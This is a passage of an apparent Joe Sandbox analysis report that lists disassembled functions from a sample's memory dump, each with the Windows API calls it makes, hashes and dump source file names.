                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c84e352c4c83bdbc706a8e2870a8ef338764c92945a48a208f3e154d417adaec
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6b857016217c0f82226c38f613cb7ea1f1baef447400b12469b73d27aeb5532f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c84e352c4c83bdbc706a8e2870a8ef338764c92945a48a208f3e154d417adaec
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1241B032A002049FCB20DF78C881A5DB3F6EF8A315F1599ACEA15FB391D631AD05CB80
                                                                                                                                                                                                                                                                                                    Function 00E8224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E82262
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E8230E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00E82316
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E82327
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E8232F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: eb3f2f83b19aa59c52e23f3535a8444c823efd124b6a6f09d6b48f9203d4eff5
                                                                                                                                                                                                                                                                                                    • Instruction ID: ca1dc82977c5c29b1aa103800417921d5403b6a4918d54c92b27288d6c58e749
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3f2f83b19aa59c52e23f3535a8444c823efd124b6a6f09d6b48f9203d4eff5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0131D471900219EFDB14DFA8CD89ADE3BB5EB04319F104229FA29FB2E0D7709944DB91
                                                                                                                                                                                                                                                                                                    Function 00E9D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9D97D
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00E9D9B4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9D9F9
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9DA0D
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9DA37
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a994577b3f373d6f6a3a83fc27060ba7795fe5bef73fd3f393aa0d04697ce9e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 37b20ad37342c738a826e5996cd7b8fa84bee13cbeadc5ee100a1272248b9fff
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a994577b3f373d6f6a3a83fc27060ba7795fe5bef73fd3f393aa0d04697ce9e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32315E71508215EFDF20EFA6DC85AABB7F8EB44354B10942EE546F2250E770EE44DB60
                                                                                                                                                                                                                                                                                                    Function 00EB61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EB61E4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EB623C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB624E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB6259
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB62B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: dc70ea531141e7895169ead15d9226a78e0467658bf9a0d0de22901b079437b4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8c892685ca438a178fff9aeba16a982faee86ca30c5d15aa0757ae91655a4c1a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc70ea531141e7895169ead15d9226a78e0467658bf9a0d0de22901b079437b4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD21A2719002189BEB119FA4DC84AEFBBB8FF44324F145256FA25FB190DB748985CF50
                                                                                                                                                                                                                                                                                                    Function 00EA138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00EA13AE
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00EA13C5
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00EA1401
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00EA140D
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00EA1445
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: becd048edff899c0a5524acf4c8a12de582e7395aaca8fedad3c0596782a2c86
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2276c4d0fbfc9d437ac16585678d10d3df066da463b1c48a24885375f5e011f4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: becd048edff899c0a5524acf4c8a12de582e7395aaca8fedad3c0596782a2c86
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF218135604214AFDB04EF65DC85A9EBBF9EF48340F148579E84AE7761DA30AC48CF90
                                                                                                                                                                                                                                                                                                    Function 00E5D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00E5D146
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5D169
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E5D18F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5D1A2
                                                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E5D1B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: aaafe2385e4f20e0aba9660b57d1738492a32b4219c75b39f9310923f331324f
                                                                                                                                                                                                                                                                                                    • Instruction ID: f2d436c39f3c3eb68fc5113652757b33838d9f9eb9a11f410180d4d1c370c046
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaafe2385e4f20e0aba9660b57d1738492a32b4219c75b39f9310923f331324f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6801D87660BA157F3331667B5D4CCBB6AADDEC2B663140629FD04E2140EA608C0982F0
                                                                                                                                                                                                                                                                                                    Function 00E5316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00E4F64E,00E4545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E53170
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E531A5
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E531CC
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E531D9
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E531E2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e8f3ddc3dc90ea276cdbe74763b661d253121a702f5f9296bb0d2d737ee0bdf
                                                                                                                                                                                                                                                                                                    • Instruction ID: df23b8d4e6121e49006365fc40c216bd644cee35c085e9ef98b7df9e624c8880
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e8f3ddc3dc90ea276cdbe74763b661d253121a702f5f9296bb0d2d737ee0bdf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA014972346E002F82122635AD85D6B26E9ABD13F77203D29FE14F2182FE318E0D4260
                                                                                                                                                                                                                                                                                                    Function 00E808FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?,?,00E80C4E), ref: 00E8091B
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80936
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80944
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?), ref: 00E80954
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80960
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c580d01eb4b8f125147b9422426effd7302007171f3b41d7ffcd899959c01b3d
                                                                                                                                                                                                                                                                                                    • Instruction ID: dce202b0c832ab301f7c6e7ff0d4bd51c64f0c8ef771b23bfa58948502bf34cc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c580d01eb4b8f125147b9422426effd7302007171f3b41d7ffcd899959c01b3d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601DB72600204AFEB456F56DC04B9B7AACEFC47A2F100224F90DF2222F770CD088BA0
                                                                                                                                                                                                                                                                                                    Function 00E8F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00E8F2AE
                                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00E8F2BC
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00E8F2C4
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00E8F2CE
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e7c06cc47c683b196e3a5a6477627d377155ee29825398c428c0c10b89f1b3bd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 460ab661f398ed75f0b06a977e4968a7622ced011d85f01be142ea44bf8d065f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7c06cc47c683b196e3a5a6477627d377155ee29825398c428c0c10b89f1b3bd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21018C75C06619DFCF00AFB9EC49AEEBB78FF08710F001566E609B2250EB309558C7A1
                                                                                                                                                                                                                                                                                                    Function 00E81A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E81A60
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A6C
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A7B
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A82
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E81A99
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b911255e051b52704eebfb50deca859b4710758c6bfe248f3572923618a3f7fc
                                                                                                                                                                                                                                                                                                    • Instruction ID: ad8bf16ecc71fbf72c983e071fe9abf0cf4596bf488eadb4463cea6dcb55c9e6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b911255e051b52704eebfb50deca859b4710758c6bfe248f3572923618a3f7fc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 180181B9641205BFDB155F65DC48D6B3B6DEF84364B2104A4F949E3260EA31DC418A60
                                                                                                                                                                                                                                                                                                    Function 00E81960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E81976
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E81982
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E81991
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E81998
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E819AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ba59700cf5da893579937aa5b253185efd88e0b756859dc502b427e31b4acdec
                                                                                                                                                                                                                                                                                                    • Instruction ID: cb1826e9ef8dc0448266e90cd7de786751e5755cfa2407639ee8ddc631d9535e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba59700cf5da893579937aa5b253185efd88e0b756859dc502b427e31b4acdec
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF06275104311AFD7215FA9EC59F573BADEFC97A0F110514FA49E7250DA70D8058B60
                                                                                                                                                                                                                                                                                                    Function 00E81900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E81916
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E81922
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E81931
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E81938
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E8194E
